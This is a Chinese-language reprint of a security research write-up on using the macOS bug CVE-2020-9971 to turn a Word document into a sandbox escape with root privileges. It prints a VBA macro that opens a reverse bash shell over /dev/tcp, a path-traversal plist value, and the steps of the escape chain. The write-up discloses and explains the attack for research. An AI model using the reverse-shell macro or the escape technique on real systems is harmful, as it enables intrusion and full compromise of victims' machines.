《電子技術應用》
您所在的位置:首頁 > 通信與網(wǎng)絡 > 業(yè)界動態(tài) > 利用CVE-2020-9971繞過Microsoft Office的應用程序沙箱

利用CVE-2020-9971繞過Microsoft Office的應用程序沙箱

2021-07-12
來源:嘶吼專業(yè)版
關鍵詞: 漏洞 Word macOSiOS

  在本文中,,研究人員展示了他們如何利用已發(fā)布的 macOS/iOS 權限提升漏洞Word 文檔武器化,解除應用程序沙箱限制并獲得更高權限,。

  CVE-2020-9971 是 macOS/iOS 中的一個邏輯漏洞,,可用于穩(wěn)定的提權漏洞,。在這篇文章中,研究人員 (@R3dF09) 提到它也可以在最受限制的應用沙箱中運行,,因此研究人員決定對其進行測試并使用武器化的 Word 文檔繞過 Microsoft Office 2019(適用于 Mac)應用沙箱,。為了完成這個任務,研究人員不得不使用一些有趣的技巧來繞過 Apple 的文件隔離,。

  CVE-2020-9971位于launchd進程中,,與XPC Services機制有關。這種機制提供了進程間通信,,允許開發(fā)人員創(chuàng)建為其應用程序執(zhí)行特定任務的服務,。這通常用于將應用程序拆分為更小的部分,從而提高可靠性和安全性,。launchd是mac系統(tǒng)下通用的進程管理器,,是mac系統(tǒng)下非常重要的一個進程,一般來說該進程不允許直接以命令行的形式調用,。只能通過其控制管理界面,,launchctl來進行控制。launchd主要功能是進程管理,??梢岳斫獬墒且粋€常駐在后臺的進程,根據(jù)用戶的配置,,來響應特定的系統(tǒng)事件,。launchd既可以用于系統(tǒng)級別的服務,又可以用于個人用戶級別的服務,。

  每個進程都有自己的域,,由 launchd 管理,其中包含有關進程可用的 XPC 服務的信息,。蘋果聲稱只有擁有者進程才能修改自己的域,,但該漏洞的核心漏洞是能夠將任意 XPC 服務添加到任意進程域中,然后觸發(fā)它在該進程的上下文中運行,。起初,攻擊者將自制的 XPC 服務“注入”到具有 root 權限的特定進程的域中(systemsoundserverd),。開發(fā)者還使用了 XPC 服務的一個眾所周知的功能來監(jiān)聽套接字以觸發(fā)和啟動它,。

  接下來,,研究人員將描述成功將 Word 文檔武器化并繞過 Word 應用程序沙箱的步驟。該研究是在易受 CVE-2020-9971 攻擊的 macOS 10.15.4 和當時最新版本的 Microsoft Office 2019 上進行的,,但這無關緊要,,因為該漏洞在操作系統(tǒng)端。

  漏洞利用

  研究人員的第一個目標是創(chuàng)建一個獨立的命令行漏洞利用,。在這個階段,,研究人員認為他們只需要刪除它并從武器化的 Word 文檔中執(zhí)行它即可,但實際情況并非如此,。無論如何,,研究人員用 XCode 創(chuàng)建了一個應用程序,附帶一個簡單的 XPC 服務,,它執(zhí)行以下步驟:

  1.查找研究人員要使用的 root 特權進程的 PID,。正如研究人員已經(jīng)知道不可能在 Office 應用沙箱中執(zhí)行 ps 一樣,研究人員改為使用 launchctl 打印系統(tǒng)的輸出,,它顯示了系統(tǒng)中的進程域,。此時研究人員注意到systemoundserverd的進程域是在啟動后延遲相當長的時間創(chuàng)建的,所以研究人員改用launchservicesd的進程域,;

  2.將研究人員的 XPC 服務注入到找到的 PID 的進程域中,;

  3.通過打開 TCP 套接字觸發(fā)研究人員的 XPC 服務的啟動;

  附帶的XPC服務只創(chuàng)建一個文件(表示成功),,并配置為在指定的TCP端口上偵聽,。漏洞利用和 XPC 服務都存儲在同一個應用程序包中,但請注意研究人員有兩個不同的可執(zhí)行文件,。

  通過這個獨立的漏洞利用,,研究人員能夠從普通用戶那里獲得 root 權限,現(xiàn)在是時候開始實現(xiàn)研究人員的最終目標了——繞過沙盒,。

  繞過沙盒

  研究人員的最終目標是使用此漏洞將 Word 文檔武器化,,以繞過應用程序沙箱。其基礎是能夠從這個Word文檔中執(zhí)行shell命令,,這可以通過Microsoft Office中的其他漏洞實現(xiàn),,或者更容易通過VBA宏實現(xiàn),這讓研究人員只剩下說服用戶按下“啟用宏”的工作,。更多關于針對 Mac 用戶的基于宏的攻擊請點此https://perception-point.io/mac-isnt-safe-how-do-you-like-them-apples/查看,。對于這個概念驗證,研究人員將使用 VBA 宏,。

  在 Office 應用沙箱的上下文中獲取 bash shell 很簡單,,然后利用這些限制。研究人員所要做的就是偵聽特定端口(例如 netcat)并從 Word 文檔中執(zhí)行以下 VBA 宏:

  MacScript(“do shell script ”“bash -I >&/dev/tcp/127.0.0.1/PORT 0>&1 &”“”)

  此時,在沙箱中有了一個shell,,研究人員試圖轉儲并執(zhí)行獨立漏洞,,但它沒有奏效。經(jīng)過一些研究,,研究人員發(fā)現(xiàn)他們在沙箱中創(chuàng)建的每個文件都是使用“com.apple.quarantine”屬性創(chuàng)建的,,這個可以通過 xattr 實用程序觀察到。

  隔離屬性是許多 macOS 保護的核心,,最初,,它僅附加到從互聯(lián)網(wǎng)下載的文件中,以執(zhí)行多項安全檢查(例如文件隔離,、GateKeeper,、Notarization 和 XProtect)。自從引入了沙箱之后,,這個屬性又增加了一個角色——標記從沙箱中創(chuàng)建的文件,,并完全阻止它們被執(zhí)行。以下是研究人員試圖從沙箱shell中轉儲和執(zhí)行一個文件時產(chǎn)生的日志:

  kernel: (Sandbox) Sandbox: bash(1724) deny(1) process-exec* /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test

  kernel: (Quarantine) exec of /Users/perceptionpoint/Library/Containers/com.microsoft.Word/Data/test denied since it was quarantined by Microsoft Word and created without user consent, qtn-flags was 0x00000086

  可以看到研究人員可以執(zhí)行 shell 命令,,但不能轉儲和運行他們自己的可執(zhí)行文件,。對于可利用的可執(zhí)行文件,研究人員有一個簡單的替換方法:只需在ctypes包的幫助下運行一個執(zhí)行相同步驟的python腳本?,F(xiàn)在研究人員就能夠將 XPC 服務注入目標進程域,,甚至觸發(fā)它的執(zhí)行,但它沒有運行:XPC 服務可執(zhí)行文件本身被標記為隔離屬性,。

  現(xiàn)在是時候更深入地研究XPC服務的結構了,。從外部看,它看起來像一個擴展名為“xpc”的單一文件,,但它實際上是一個具有典型結構的文件夾:

微信圖片_20210712140230.jpg

  主要組件是 Info.plist 文件,,它是一個描述服務的 XML 文件,以及可執(zhí)行文件本身(位于 MacOS 文件夾內),。Info.plist 中的部分內容如下:

  < key >CFBundleExecutable< /key >< string >AppService< /string >

  研究人員不能使用他們自己的可執(zhí)行文件,,所以唯一的選擇是使用系統(tǒng)現(xiàn)有的可執(zhí)行文件之一。研究人員嘗試在 CFBundleExecutable 項中使用完整路徑,,但是 XPC 服務根本無法加載,。很明顯,macOS 會在目錄 Contents/MacOS 中查找具有此項中指定名稱的可執(zhí)行文件,,也許研究人員可以使用路徑遍歷來指向現(xiàn)有的可執(zhí)行文件,,并嘗試將值更改為:

  < key >CFBundleExecutable< /key >< string >/////////usr/bin/yes< /string >

  令研究人員驚訝的是,它奏效了,!當研究人員使用這個“假”XPC 服務執(zhí)行漏洞利用時,,研究人員發(fā)現(xiàn)了一個具有 root 權限的“是”進程,,即使研究人員是從沙箱中執(zhí)行的。

  因此,,研究人員有能力以 root 權限運行進程,,但似乎無法控制它們的參數(shù)。在團隊內部就這個問題進一步咨詢后,,研究人員想出了一個好辦法,他們注意到可以控制新進程的環(huán)境變量,,即運行一個 shell 作為 XPC 服務(例如 zsh),,將其 HOME 目錄更改為研究人員可以控制,并將 shell 在執(zhí)行開始時提供的文件放在那里(例如,。zshenv),。

  將它們全部封裝在一起

  研究人員編寫了一個 python 腳本,執(zhí)行以下步驟:

  1.將“,。zshenv”文件寫入當前目錄,,在沙箱內,路徑為 /Users/user/Library/Containers/com.microsoft.Word/Data,,其中包含研究人員希望以 root 身份執(zhí)行的載荷,;

  2.查找研究人員要使用的 root 權限進程的 PID (launchservicesd);

  3.創(chuàng)建“假”XPC 服務,,其中可執(zhí)行文件指向 zsh,,并將 HOME 環(huán)境變量設置為當前目錄;

  4.將“假”XPC 服務注入到找到的 PID 的進程域中,;

  5.通過打開 TCP 套接字觸發(fā) XPC 服務的啟動,;

  然后研究人員將該腳本封裝為 base64 格式,以便從VBA宏中執(zhí)行它,,并將其插入到 AutoOpen 子例程中,。具體演示過程請點此,其中有效載荷只在/tmp/hacked中創(chuàng)建一個文件(請注意,,該文件是以 root 身份創(chuàng)建的,,并且沒有隔離位)。

  總結

  研究人員證明了 CVE-2020-9971 可以用作沙箱逃逸漏洞,,以 Word 文檔作為研究人員的 POC,。在這個過程中,研究人員發(fā)現(xiàn)了一種通過 XPC 服務啟動任意可執(zhí)行文件的方法(在 CFBundleExecutable 值中進行路徑遍歷),,特別是執(zhí)行 shell 腳本(通過控制 HOME 環(huán)境變量和轉儲 .zshenv 文件的技巧),。

  這個沙箱逃逸漏洞使研究人員能夠為 macOS 創(chuàng)建一個快速、簡單和廉價的武器化 Word 文檔,,這嚴重危害了系統(tǒng)安全,。

  安全建議

  1.避免打開陌生文檔,尤其是運行來自未知來源或你不完全信任的發(fā)送方;

  2.使用能夠處理此類攻擊的綜合性安全產(chǎn)品,。




電子技術圖片.png

本站內容除特別聲明的原創(chuàng)文章之外,,轉載內容只為傳遞更多信息,并不代表本網(wǎng)站贊同其觀點,。轉載的所有的文章,、圖片、音/視頻文件等資料的版權歸版權所有權人所有,。本站采用的非本站原創(chuàng)文章及圖片等內容無法一一聯(lián)系確認版權者,。如涉及作品內容、版權和其它問題,,請及時通過電子郵件或電話通知我們,,以便迅速采取適當措施,避免給雙方造成不必要的經(jīng)濟損失,。聯(lián)系電話:010-82306118,;郵箱:[email protected]